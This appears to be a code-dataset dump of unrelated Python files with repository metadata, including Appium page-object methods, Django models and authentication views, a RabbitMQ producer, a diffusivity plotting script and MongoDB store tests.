#*********************************【PAGE3】人脉首页-点击联系人-消息-热度设置-周期:RMSY_contacts_msg_menu_heatsetting_period*********************************
#定位:人脉首页-点击联系人-消息-热度设置-周期-返回:点击
def RMSY_contacts_msg_menu_heatsetting_period_back_click(self):
return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_back)
#定位:人脉首页-点击联系人-消息-热度设置-周期-每天:点击
def RMSY_contacts_msg_menu_heatsetting_period_everyday_click(self):
return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_everyday)
#定位:人脉首页-点击联系人-消息-热度设置-周期-工昨日:点击
def RMSY_contacts_msg_menu_heatsetting_period_workday_click(self):
return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_workday)
#定位:人脉首页-点击联系人-消息-热度设置-周期-节假日:点击
def RMSY_contacts_msg_menu_heatsetting_period_holiday_click(self):
return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_holiday)
#定位:人脉首页-点击联系人-消息-热度设置-周期-择日:点击
def RMSY_contacts_msg_menu_heatsetting_period_selectday_click(self):
return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_selectday)
#定位:人脉首页-点击联系人-消息-热度设置-周期-保存:点击
def RMSY_contacts_msg_menu_heatsetting_period_save_click(self):
return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_save)
#*********************************【PAGE4】人脉首页-点击联系人-消息-热度设置-时段:RMSY_contacts_msg_menu_heatsetting_time*********************************
#定位:人脉首页-点击联系人-消息-热度设置-时段-确定:点击
def RMSY_contacts_msg_menu_heatsetting_time_confirm_click(self):
return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_time_confirm)
#定位:人脉首页-点击联系人-消息-热度设置-时段-取消:点击
def RMSY_contacts_msg_menu_heatsetting_time_cancel_click(self):
return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_time_cancel)
|
[
"[email protected]"
] | |
1489a49a4e6ccd3697af23f1e682ca9574953838
|
efe6c52938fe5c7a259514ad317484057edfeff7
|
/tube/models.py
|
7526f1fa46150f5b12037f9489d41f329289eb0d
|
[] |
no_license
|
seiya0723/video_site_02
|
69413879248a2cc314dd5c83c9bedb564e170aba
|
5ffcccb1f64b83bb3bf1c9bfd42c9896ff28eb85
|
refs/heads/master
| 2023-03-31T21:02:25.877950 | 2021-04-14T00:45:14 | 2021-04-14T00:45:14 | 357,728,585 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 438 |
py
|
from django.db import models
from django.utils import timezone
class Video(models.Model):
class Meta:
db_table = "video"
title = models.CharField(verbose_name="タイトル", max_length=30)
comment = models.CharField(verbose_name="動画説明文", max_length=2000)
dt = models.DateTimeField(verbose_name="投稿日", default=timezone.now)
def __str__(self):
return self.title
|
[
"seiya@asahina"
] |
seiya@asahina
|
bfba43a40c44ed33df829ed9cd1755d9c69e70f7
|
736250d9d14552c5fa0aca25b25d9c8a28fcd1a0
|
/sssionpro/manage.py
|
3b9b39fa5263b2fcca0a11cb1b35b13a433a6d39
|
[] |
no_license
|
maheswatapradhan/feedback
|
57f052a2082902cb8a72b474e0b863b7a00d1c9c
|
31c7dcb113a38e29b3a56481fcb9ae2fce7d61a2
|
refs/heads/master
| 2020-09-15T23:42:32.041306 | 2019-11-23T12:54:25 | 2019-11-23T12:54:25 | 223,585,900 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 252 |
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "sssionpro.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
[
"[email protected]"
] | |
e5c3105a3f2f825626898ed2c619b599f820a0e9
|
f1a8e308c76866e2fba20401e6f1d5842dd60c46
|
/Algorithms and Data Structures Practice/LeetCode Questions/Greedy/TieRopes.py
|
0ca4144df73641761d8095f25ec57753846b4744
|
[] |
no_license
|
harman666666/Algorithms-Data-Structures-and-Design
|
6e5da0c1f701e7dfc7b045ecd1209463131d3fc7
|
483f0c93faca8ccaf038b77ebe2fa712f6b0c6bc
|
refs/heads/master
| 2021-07-14T10:11:27.588838 | 2021-07-07T01:47:42 | 2021-07-07T01:47:42 | 101,330,760 | 3 | 1 | null | 2018-10-15T04:52:07 | 2017-08-24T19:32:03 |
Python
|
UTF-8
|
Python
| false | false | 2,234 |
py
|
'''
There are N ropes numbered from 0 to N − 1, whose lengths are given in an array A, lying on the floor in a line. For each I (0 ≤ I < N), the length of rope I on the line is A[I].
We say that two ropes I and I + 1 are adjacent. Two adjacent ropes can be tied together with a knot, and the length of the tied rope is the sum of lengths of both ropes. The resulting new rope can then be tied again.
For a given integer K, the goal is to tie the ropes in such a way that the number of ropes whose length is greater than or equal to K is maximal.
For example, consider K = 4 and array A such that:
A[0] = 1
A[1] = 2
A[2] = 3
A[3] = 4
A[4] = 1
A[5] = 1
A[6] = 3
The ropes are shown in the figure below.
We can tie:
rope 1 with rope 2 to produce a rope of length A[1] + A[2] = 5;
rope 4 with rope 5 with rope 6 to produce a rope of length A[4] + A[5] + A[6] = 5.
After that, there will be three ropes whose lengths are greater than or equal to K = 4. It is not possible to produce four such ropes.
Write a function:
def solution(K, A)
that, given an integer K and a non-empty array A of N integers, returns the maximum number of ropes of length greater than or equal to K that can be created.
For example, given K = 4 and array A such that:
A[0] = 1
A[1] = 2
A[2] = 3
A[3] = 4
A[4] = 1
A[5] = 1
A[6] = 3
the function should return 3, as explained above.
Write an efficient algorithm for the following assumptions:
N is an integer within the range [1..100,000];
K is an integer within the range [1..1,000,000,000];
each element of array A is an integer within the range [1..1,000,000,000].
'''
# you can write to stdout for debugging purposes, e.g.
# print("this is a debug message")
def solution(K, A):
'''
Identify ropes that are smaller,
than K, and merge them together.
but dont merge with a rope that is already greater than K.
Or just look at first rope, if its less than K,
merge with right one,
'''
sum = 0
count = 0
for i in A:
if (sum + i) >= K:
count += 1
sum = 0
else:
sum += i
return count
|
[
"[email protected]"
] | |
685fda18ad8cf4719f324feb24e823122bb0d341
|
795df757ef84073c3adaf552d5f4b79fcb111bad
|
/stochastic_diffusion/diffusivity_1d_xk.py
|
62a6b21a6bbb4ecffa0bba1ee3ca9d405324092c
|
[] |
no_license
|
tnakaicode/jburkardt-python
|
02cb2f9ba817abf158fc93203eb17bf1cb3a5008
|
1a63f7664e47d6b81c07f2261b44f472adc4274d
|
refs/heads/master
| 2022-05-21T04:41:37.611658 | 2022-04-09T03:31:00 | 2022-04-09T03:31:00 | 243,854,197 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,885 |
py
|
#! /usr/bin/env python3
#
def diffusivity_1d_xk ( dc0, m, omega, n, x ):
#*****************************************************************************80
#
## DIFFUSIVITY_1D_XK evaluates a 1D stochastic diffusivity function.
#
# Discussion:
#
# The 1D diffusion equation has the form
#
# - d/dx ( DC(X) Del U(X) ) = F(X)
#
# where DC(X) is a function called the diffusivity.
#
# In the stochastic version of the problem, the diffusivity function
# includes the influence of stochastic parameters:
#
# - d/dx ( DC(XOMEGA) d/dx U(X) ) = F(X).
#
# In this function, the domain is assumed to be the unit interval [0.1].
#
#
# For DC0 = 1 and F(X) = 0, with boundary conditions U(0:OMEGA) = 0,
# U(1OMEGA) = 1, the exact solution is
#
# If OMEGA ~= 0:
#
# U(XOMEGA) = log ( 1 + OMEGA * X ) / log ( 1 + OMEGA )
#
# If OMEGA = 0:
#
# U(XOMEGA) = X
#
# In the numerical experiments described in the paper, OMEGA was taken
# to be a random variable with a Beta, or Uniform, or Gaussian or
# Poisson or Binomial distribution.
#
# For the Gaussian and Poisson distributions, the positivity requirement could not
# be guaranteed, and the experiments were simply made with a "small"
# variance of 0.1.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 20 December 2009
#
# Author:
#
# John Burkardt
#
# Reference:
#
# Dongbin Xiu, George Karniadakis,
# Modeling uncertainty in steady state diffusion problems via
# generalized polynomial chaos,
# Computer Methods in Applied Mechanics and Engineering,
# Volume 191, 2002, pages 4927-4948.
#
# Parameters:
#
# Input, real DC0, the constant term in the expansion of the
# diffusion coefficient.
#
# Input, integer M, the number of stochastic parameters.
#
# Input, real OMEGA(M), the stochastic parameters.
#
# Input, integer N, the number of evaluation points.
#
# Input, real X(N), the point where the diffusion coefficient is to
# be evaluated.
#
# Output, real DC(N), the value of the diffusion coefficient at X.
#
import numpy as np
k = 0
w = 1.0
arg = np.zeros(n)
while ( k < m ):
if ( k < m ):
arg = arg + omega[k] * np.sin ( w * np.pi * x )
k = k + 1
if ( k < m ):
arg = arg + omega[k] * np.cos ( w * np.pi * x )
k = k + 1
w = w + 1.0
arg = np.exp ( - 0.125 ) * arg
dc = dc0 + np.exp ( arg )
return dc
def diffusivity_1d_xk_contour ( ):
#*****************************************************************************80
#
## diffusivity_1d_xk_contour displays contour plots of a 1D stochastic diffusivity function.
#
# Discussion:
#
# The diffusivity function is compute by DIFFUSIVITY_1D_XK.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 08 February 2019
#
# Author:
#
# John Burkardt
#
# Reference:
#
# Dongbin Xiu, George Karniadakis,
# Modeling uncertainty in steady state diffusion problems via
# generalized polynomial chaos,
# Computer Methods in Applied Mechanics and Engineering,
# Volume 191, 2002, pages 4927-4948.
#
import matplotlib.pyplot as plt
import numpy as np
print ( '' )
print ( 'diffusivity_1d_xk_contour' )
print ( ' Display the stochastic diffusivity function' )
print ( ' defined by DIFFUSIVITY_1D_XK.' )
#
# Set the spatial grid.
#
n = 51
x_min = -1.0
x_max = +1.0
x = np.linspace ( x_min, x_max, n )
#
# Sample the OMEGA values.
# Use a seed of 0 for the MATLAB random number generator.
#
m = 5
omega = np.random.randn ( m )
#
# Compute the diffusivity field.
#
dc0 = 10.0
dc = diffusivity_1d_xk ( dc0, m, omega, n, x )
#
# Plot the diffusivity field.
#
plt.plot ( x, dc, linewidth = 2 )
plt.grid ( True )
plt.xlabel ( '<--- X --->' )
plt.ylabel ( 'DC(X)' )
plt.title ( 'XK Stochastic diffusivity function' )
filename = 'diffusivity_1d_xk.png'
plt.savefig ( filename )
print ( '' )
print ( ' Graphics saved as "%s".' % ( filename ) )
return
def diffusivity_1d_xk_test ( ):
#*****************************************************************************80
#
## diffusivity_1d_xk_test tests diffusivity_1d_xk.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 08 February 2019
#
# Author:
#
# John Burkardt
#
# Parameters:
#
# None
#
import platform
print ( '' )
print ( 'diffusivity_1d_xk_test:' )
print ( ' Python version: %s' % ( platform.python_version ( ) ) )
print ( ' Test diffusivity_1d_xk.' )
diffusivity_1d_xk_contour ( )
#
# Terminate.
#
print ( '' )
print ( 'diffusivity_1d_xk_test:' )
print ( ' Normal end of execution.' )
return
if ( __name__ == '__main__' ):
from timestamp import timestamp
timestamp ( )
diffusivity_1d_xk_test ( )
timestamp ( )
|
[
"[email protected]"
] | |
f4f21fb5b2c269df3326b786e78e6edc3d4fb923
|
5b002b82b025ee371432b436a0c19b000a0df2dd
|
/setup.py
|
93cb4423f1905fc32138f022a24043d62d1e8831
|
[
"Apache-2.0"
] |
permissive
|
mvexel/whathappened
|
c5bfeeb1f41b20cd2f5f4c7782412a39090868b2
|
92805128d2a01909d89fca0650b585d8cac256e0
|
refs/heads/master
| 2021-01-19T09:10:53.189344 | 2017-04-10T00:05:24 | 2017-04-10T00:05:24 | 87,735,951 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 220 |
py
|
from setuptools import setup
setup(
name='whathappened',
packages=['whathappened'],
include_package_data=True,
install_requires=[
'flask',
'requests',
'gunicorn==19.7.0'
],
)
|
[
"[email protected]"
] | |
a1eeaddd15d2c948ed131f7a126f1ce98e9c1c6c
|
c8f023c1e2c9ecb9ffe328044ef3f013de0857a7
|
/src/apps/authentication/views.py
|
2523e22d739640c45818632c83a2d47a605d0269
|
[
"MIT"
] |
permissive
|
snicoper/django-boilerplate
|
851932459fca8b4a6c9220d8ad3ca8f94b14b7a2
|
88cc24c3a2e935fd1be139368288cae6c38679e4
|
refs/heads/master
| 2021-01-18T18:40:36.633342 | 2018-10-15T07:54:59 | 2018-10-15T07:54:59 | 29,604,293 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,839 |
py
|
from django.conf import settings
from django.contrib import messages
from django.contrib.auth import get_user_model, views
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.sites.shortcuts import get_current_site
from django.shortcuts import get_object_or_404, redirect, render
from django.urls import reverse, reverse_lazy
from django.utils.translation import ugettext as _
from django.views import generic
from utils.http import get_full_path
from utils.mail import send_templated_mail
from utils.mixins.views import AnonymousRequiredMixin
from .forms import AuthenticationForm, RegisterUserForm, UserEmailUpdateForm
from .models import RegisterUser, UserEmailUpdate
UserModel = get_user_model()
class RegisterUserFormView(AnonymousRequiredMixin, generic.CreateView):
template_name = 'authentication/register.html'
form_class = RegisterUserForm
model = RegisterUser
def __init__(self, *args, **kwargs):
"""Elimina posibles usuarios expirados."""
RegisterUser.objects.delete_expired_users_temp()
super().__init__(*args, **kwargs)
def get_success_url(self):
"""Si todo OK, envía el email para verificación y redirecciona."""
self._send_email_with_token()
return reverse('authentication:success')
def _send_email_with_token(self):
"""Envía un email con token para terminar proceso de registro."""
current_site = get_current_site(self.request)
site_name = current_site.name
url_validate_token = get_full_path(
self.request,
'authentication:validate_token',
token=self.object.token
)
context = {
'username': self.object.username,
'email': self.object.email,
'site_name': site_name,
'url_validate_token': url_validate_token
}
send_templated_mail(
subject=_(f'Validación de email en {site_name}'),
from_email=settings.GROUP_EMAILS['NO-REPLY'],
recipients=[self.object.email],
context=context,
template_text='authentication/emails/register_success.txt'
)
class RegisterUserSuccessView(AnonymousRequiredMixin, generic.TemplateView):
template_name = 'authentication/success.html'
class RegisterUserValidateTokenView(AnonymousRequiredMixin, generic.TemplateView):
"""Validación email de un nuevo registro a través del token."""
template_name = 'authentication/validate_token.html'
def get(self, request, *args, **kwargs):
RegisterUser.objects.delete_expired_users_temp()
token = self.kwargs.get('token')
try:
user_temp = RegisterUser.objects.get(token=token)
except RegisterUser.DoesNotExist:
return render(request, 'authentication/token_not_exists.html')
RegisterUser.objects.move_user_tmp_to_users(UserModel, user_temp)
messages.success(request, _('El registro se ha completado con éxito'))
return redirect(reverse('authentication:login'))
class LoginView(AnonymousRequiredMixin, views.LoginView):
template_name = 'authentication/login.html'
form_class = AuthenticationForm
class LogoutView(LoginRequiredMixin, views.LogoutView):
template_name = 'authentication/logged_out.html'
class PasswordResetView(AnonymousRequiredMixin, views.PasswordResetView):
template_name = 'authentication/password_reset_form.html'
email_template_name = 'authentication/emails/password_reset_email.html'
subject_template_name = 'authentication/emails/password_reset_subject.txt'
success_url = reverse_lazy('authentication:password_reset_done')
class PasswordResetDoneView(AnonymousRequiredMixin, views.PasswordResetDoneView):
template_name = 'authentication/password_reset_done.html'
class PasswordResetConfirmView(AnonymousRequiredMixin, views.PasswordResetConfirmView):
template_name = 'authentication/password_reset_confirm.html'
success_url = reverse_lazy('authentication:password_reset_complete')
class PasswordResetCompleteView(AnonymousRequiredMixin, views.PasswordResetCompleteView):
template_name = 'authentication/password_reset_complete.html'
class PasswordChangeView(views.PasswordChangeView):
template_name = 'authentication/password_change_form.html'
success_url = reverse_lazy('authentication:password_change_done')
class PasswordChangeDoneView(views.PasswordChangeDoneView):
template_name = 'authentication/password_change_done.html'
class UserEmailUpdateView(LoginRequiredMixin, generic.FormView):
template_name = 'authentication/email_update.html'
form_class = UserEmailUpdateForm
model = UserEmailUpdate
def get_initial(self):
"""Establece datos en los campos del form."""
initial = super().get_initial()
initial['user'] = self.request.user.id
initial['token'] = UserEmailUpdate.objects.generate_unique_token()
initial['new_email'] = self.request.user.email
return initial
def form_valid(self, form):
"""Envía el email de confirmación."""
new_email = form.cleaned_data['new_email']
token = form.cleaned_data['token']
UserEmailUpdate.objects.update_or_create(
defaults={'new_email': new_email, 'token': token},
user=self.request.user
)
self._send_confirm_email_for_validate(token, new_email)
return super().form_valid(form)
def get_success_url(self):
msg = _('Se ha enviado un email a la nueva dirección para la confirmación')
messages.success(self.request, msg)
return reverse('accounts:profile')
def _send_confirm_email_for_validate(self, token, new_email):
"""Envía un email para la confirmación del nuevo email con un token."""
current_site = get_current_site(self.request)
url_validate_token = get_full_path(
self.request,
'authentication:email_update_validate',
token=token
)
context = {
'url_validate_token': url_validate_token,
'site_name': current_site.name
}
send_templated_mail(
subject=_('Confirmación cambio de email'),
from_email=settings.GROUP_EMAILS['NO-REPLY'],
recipients=[new_email],
context=context,
template_text='authentication/emails/email_update_confirm.txt'
)
class UserEmailUpdateValidateView(LoginRequiredMixin, generic.View):
"""Verifica el token de cambio de email.
Para mayor seguridad, el usuario ha de estar logueado.
Una vez comprobado y actualizado el nuevo email, elimina el
email temporal.
"""
def get(self, request, *args, **kwargs):
"""Comprueba el token que coincida."""
token = kwargs.get('token')
try:
email_update = UserEmailUpdate.objects.get(token=token, user=request.user)
except UserEmailUpdate.DoesNotExist:
return redirect('authentication:token_email_not_exists')
self.request.user.email = email_update.new_email
self.request.user.save()
email_update.delete()
messages.success(request, _('Se ha actualizado el email'))
return redirect(reverse('accounts:profile'))
class UserEmailUpdateNotFoundView(generic.TemplateView):
"""El token no existe o no pertenece al usuario."""
template_name = 'authentication/token_email_not_exists.html'
class UserRemoveEmailUpdateView(generic.View):
"""Eliminar un email no confirmado por parte del usuario."""
def post(self, request, *args, **kwargs):
get_object_or_404(UserEmailUpdate, user=request.user).delete()
messages.success(request, _('Email eliminado con éxito'))
return redirect(reverse('accounts:profile'))
|
[
"[email protected]"
] | |
18cca05e8062f4f535054f5fd1a51304be50beb2
|
052275c2dd6d59a0d0fcfe85591b44106343662b
|
/listings/urls.py
|
a3b13c17beedfeffab4f7f72383dfe1ae84efa0b
|
[] |
no_license
|
nimadorostkar/Django-Real-Estate
|
93d104ad1847674103e525ae428af186fffa9e30
|
bf868e49bb4703e4081d8e7e9fd5e3ae23fc9af9
|
refs/heads/master
| 2023-08-10T17:07:29.829253 | 2021-09-19T10:55:47 | 2021-09-19T10:55:47 | 338,533,461 | 23 | 9 | null | null | null | null |
UTF-8
|
Python
| false | false | 281 |
py
|
from django.urls import path
from .views import (ListingListView, ListingDetailView, search)
urlpatterns = [
path('', ListingListView.as_view(), name='listings'),
path('<int:pk>', ListingDetailView.as_view(), name='listing'),
path('search', search, name='search'),
]
|
[
"[email protected]"
] | |
0efcee193c5cdeb0e1fe1f35336a1798a94c1084
|
59080f5116b9e8f625b5cc849eb14b7ff9d19f3d
|
/122 rabbitmq/producer.py
|
f519020c40c53d1b353416228a61b9216f10522a
|
[] |
no_license
|
yyq1609/Python_road
|
eda2bcd946b480a05ec31cdcb65e35b3f3e739d1
|
e9ba2f47c8dd2d00a6e5ddff03c546152efd8f49
|
refs/heads/master
| 2020-09-11T11:51:35.903284 | 2019-11-11T13:02:21 | 2019-11-11T13:02:21 | 222,054,462 | 1 | 0 | null | 2019-11-16T05:58:13 | 2019-11-16T05:58:12 | null |
UTF-8
|
Python
| false | false | 535 |
py
|
import pika
credentials = pika.PlainCredentials('echo', '123')
connection = pika.BlockingConnection(pika.ConnectionParameters('172.16.44.142', virtual_host='vhost1', credentials=credentials))
channel = connection.channel()
channel.queue_declare(queue='test', durable=True)
channel.basic_publish(exchange='',
routing_key='test',
body='One order here!',
properties=pika.BasicProperties(delivery_mode=2),
)
print('下单成功')
connection.close()
|
[
"[email protected]"
] | |
609f208316babac07ccff737f84094897e5d863c
|
59166105545cdd87626d15bf42e60a9ee1ef2413
|
/dbpedia/models/unknown.py
|
dd1afb9f030bccf6a3766988d89ff96438847c90
|
[] |
no_license
|
mosoriob/dbpedia_api_client
|
8c594fc115ce75235315e890d55fbf6bd555fa85
|
8d6f0d04a3a30a82ce0e9277e4c9ce00ecd0c0cc
|
refs/heads/master
| 2022-11-20T01:42:33.481024 | 2020-05-12T23:22:54 | 2020-05-12T23:22:54 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,224 |
py
|
# coding: utf-8
"""
DBpedia
This is the API of the DBpedia Ontology # noqa: E501
The version of the OpenAPI document: v0.0.1
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from dbpedia.configuration import Configuration
class Unknown(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'description': 'list[str]',
'id': 'str',
'label': 'list[str]',
'type': 'list[str]'
}
attribute_map = {
'description': 'description',
'id': 'id',
'label': 'label',
'type': 'type'
}
def __init__(self, description=None, id=None, label=None, type=None, local_vars_configuration=None): # noqa: E501
"""Unknown - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._description = None
self._id = None
self._label = None
self._type = None
self.discriminator = None
self.description = description
if id is not None:
self.id = id
self.label = label
self.type = type
@property
def description(self):
"""Gets the description of this Unknown. # noqa: E501
small description # noqa: E501
:return: The description of this Unknown. # noqa: E501
:rtype: list[str]
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this Unknown.
small description # noqa: E501
:param description: The description of this Unknown. # noqa: E501
:type: list[str]
"""
self._description = description
@property
def id(self):
"""Gets the id of this Unknown. # noqa: E501
identifier # noqa: E501
:return: The id of this Unknown. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this Unknown.
identifier # noqa: E501
:param id: The id of this Unknown. # noqa: E501
:type: str
"""
self._id = id
@property
def label(self):
"""Gets the label of this Unknown. # noqa: E501
short description of the resource # noqa: E501
:return: The label of this Unknown. # noqa: E501
:rtype: list[str]
"""
return self._label
@label.setter
def label(self, label):
"""Sets the label of this Unknown.
short description of the resource # noqa: E501
:param label: The label of this Unknown. # noqa: E501
:type: list[str]
"""
self._label = label
@property
def type(self):
"""Gets the type of this Unknown. # noqa: E501
type of the resource # noqa: E501
:return: The type of this Unknown. # noqa: E501
:rtype: list[str]
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this Unknown.
type of the resource # noqa: E501
:param type: The type of this Unknown. # noqa: E501
:type: list[str]
"""
self._type = type
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Unknown):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, Unknown):
return True
return self.to_dict() != other.to_dict()
|
[
"[email protected]"
] | |
9a3dff4505416c7621031482886acde695f4199e
|
bb00a3876ddb49dcea2cdc4bbd2356359260a563
|
/poptimizer/evolve/tests/test_store.py
|
d20ee06f325caec712a7a86b4cc74674f8863523
|
[
"Unlicense"
] |
permissive
|
hraffiest/poptimizer
|
1d2975acd0ecbe8466a7a1aa1bf631d12b4c9854
|
16bc9e056a6daa452d48cdac0dea5901e4a3d4a1
|
refs/heads/master
| 2023-04-21T02:29:06.259420 | 2021-05-05T14:33:03 | 2021-05-05T14:33:03 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,176 |
py
|
from types import SimpleNamespace
import bson
import pymongo
import pytest
from poptimizer.evolve import store
@pytest.fixture(scope="module", autouse=True)
def set_test_collection():
# noinspection PyProtectedMember
saved_collection = store._COLLECTION
test_collection = saved_collection.database["test"]
store._COLLECTION = test_collection
yield
store._COLLECTION = saved_collection
test_collection.drop()
def test_get_collection():
collection = store.get_collection()
assert isinstance(collection, pymongo.collection.Collection)
assert collection.name == "test"
@pytest.fixture(scope="class", name="field_instance")
def make_field_and_instance():
field = store.BaseField()
instance = SimpleNamespace()
instance._update = {}
return field, instance
class TestBaseField:
def test_set_name_index(self):
field = store.BaseField(index=True)
field.__set_name__(SimpleNamespace, "some")
assert field._name == store.ID
def test_set_name(self, field_instance):
field, _ = field_instance
field.__set_name__(SimpleNamespace, "some")
assert field._name == "some"
def test_get_raise(self, field_instance):
field, instance = field_instance
with pytest.raises(AttributeError) as error:
field.__get__(instance, SimpleNamespace)
assert "'SimpleNamespace' object has no attribute 'some'" in str(error.value)
def test_set(self, field_instance):
field, instance = field_instance
field.__set__(instance, 42)
assert hasattr(instance, "some")
assert instance.some == 42
assert len(instance._update) == 1
assert instance._update["some"] == 42
def test_get(self, field_instance):
field, instance = field_instance
assert field.__get__(instance, SimpleNamespace) == 42
@pytest.fixture(scope="class", name="default_field_instance")
def make_default_field_and_instance():
field = store.DefaultField(53)
field.__set_name__(SimpleNamespace, "some")
instance = SimpleNamespace()
instance._update = {}
return field, instance
class TestDefaultField:
def test_unset_get(self, default_field_instance):
field, instance = default_field_instance
assert field.__get__(instance, SimpleNamespace) == 53
def test_set_get(self, default_field_instance):
field, instance = default_field_instance
field.__set__(instance, 64)
assert field.__get__(instance, SimpleNamespace) == 64
@pytest.fixture(scope="class", name="genotype_field_instance")
def make_genotype_field_and_instance():
field = store.GenotypeField()
field.__set_name__(SimpleNamespace, "some")
instance = SimpleNamespace()
instance._update = {}
return field, instance
class TestGenotypeField:
def test_set_not_genotype(self, genotype_field_instance):
field, instance = genotype_field_instance
field.__set__(instance, None)
rez = field.__get__(instance, SimpleNamespace)
assert isinstance(rez, store.Genotype)
assert isinstance(instance.some, store.Genotype)
assert rez is instance.some
def test_set_genotype(self, genotype_field_instance):
field, instance = genotype_field_instance
genotype = store.Genotype(None)
field.__set__(instance, genotype)
assert genotype is field.__get__(instance, SimpleNamespace)
assert genotype is instance.some
class TestDoc:
def test_new_doc_and_save(self):
assert store.get_collection().count_documents({}) == 0
genotype = store.Genotype()
doc = store.Doc(genotype=genotype)
assert store.get_collection().count_documents({}) == 0
assert len(doc._update) == 2
assert isinstance(doc.id, bson.ObjectId)
assert doc.genotype is genotype
assert doc.wins == 0
assert doc.model is None
with pytest.raises(AttributeError) as error:
isinstance(doc.llh, bson.ObjectId)
assert "object has no attribute 'llh'" in str(error.value)
assert doc.date is None
assert doc.timer == 0
assert doc.tickers is None
doc.save()
assert store.get_collection().count_documents({}) == 1
assert len(doc._update) == 0
def test_load_wrong_doc(self):
id_ = bson.ObjectId()
with pytest.raises(store.IdError) as error:
store.Doc(id_=id_)
assert str(id_) in str(error.value)
def test_load_doc(self):
db_doc = store.get_collection().find_one()
doc = store.Doc(id_=db_doc[store.ID])
assert len(doc._update) == 0
assert doc.id == db_doc[store.ID]
assert doc.genotype == db_doc["genotype"]
assert doc.wins == 0
assert doc.model is None
with pytest.raises(AttributeError) as error:
isinstance(doc.llh, bson.ObjectId)
assert "object has no attribute 'llh'" in str(error.value)
assert doc.date is None
assert doc.timer == 0
assert doc.tickers is None
def test_load_doc_update_and_save(self):
db_doc = store.get_collection().find_one()
doc = store.Doc(id_=db_doc[store.ID])
assert len(doc._update) == 0
doc.wins = 42
doc.llh = 2.2
doc.timer = 111
assert len(doc._update) == 3
doc.save()
assert len(doc._update) == 0
doc_loaded = store.Doc(id_=db_doc[store.ID])
assert len(doc_loaded._update) == 0
assert doc_loaded.id == db_doc[store.ID]
assert doc_loaded.genotype == db_doc["genotype"]
assert doc_loaded.wins == 42
assert doc_loaded.model is None
assert doc_loaded.llh == 2.2
assert doc_loaded.date is None
assert doc_loaded.timer == 111
assert doc_loaded.tickers is None
def test_delete(self):
assert store.get_collection().count_documents({}) == 1
db_doc = store.get_collection().find_one()
doc = store.Doc(id_=db_doc[store.ID])
doc.delete()
assert store.get_collection().count_documents({}) == 0
|
[
"[email protected]"
] | |
6c917765f0811b156ddda90eac4c87e9f06185f7
|
f98c9dea0e212be5c7bc3161499e5633383bd4d7
|
/python/fruit_package_module_test.py
|
c82839cdcdd29c508d4f8791380d7717c7237b7c
|
[
"MIT"
] |
permissive
|
ysoftman/test_code
|
dddb5bee3420977bfa335320a09d66e5984403f5
|
0bf6307073081eeb1d654a1eb5efde44a0bdfe1e
|
refs/heads/master
| 2023-08-17T05:45:49.716829 | 2023-08-16T05:00:09 | 2023-08-16T05:00:09 | 108,200,568 | 4 | 0 |
MIT
| 2023-03-15T04:23:10 | 2017-10-25T00:49:26 |
C++
|
UTF-8
|
Python
| false | false | 509 |
py
|
# 패키지(모듈이 모인 디렉토리)가 이닌 모듈이 같은 경로에 있는 경우
# import fruite_module as fm
# alias 로 패키지.모듈 사용하기
import fruite_package.fruit_module as fm
fm.fruit.apple(100)
fm.fruit.lemon("2000")
# 패키지.모듈 전체 사용하기
from fruite_package.fruit_module import *
fruit.apple(100)
# 패키지.모듈 중 fruit 클래스를 fr 이름으로 사용
from fruite_package.fruit_module import fruit as fr
fr.lemon(200)
fr.apple(50)
fr.orange(100)
|
[
"[email protected]"
] | |
22cff3945dd868a9c060382d1020722c7a4d2eea
|
4a08ae605a8f96146b14881330d21317a67e225d
|
/data_types/question17.py
|
a245b912a288e46b12cce2f9783bf7dbe0c76b56
|
[] |
no_license
|
alex1the1great/Assignment
|
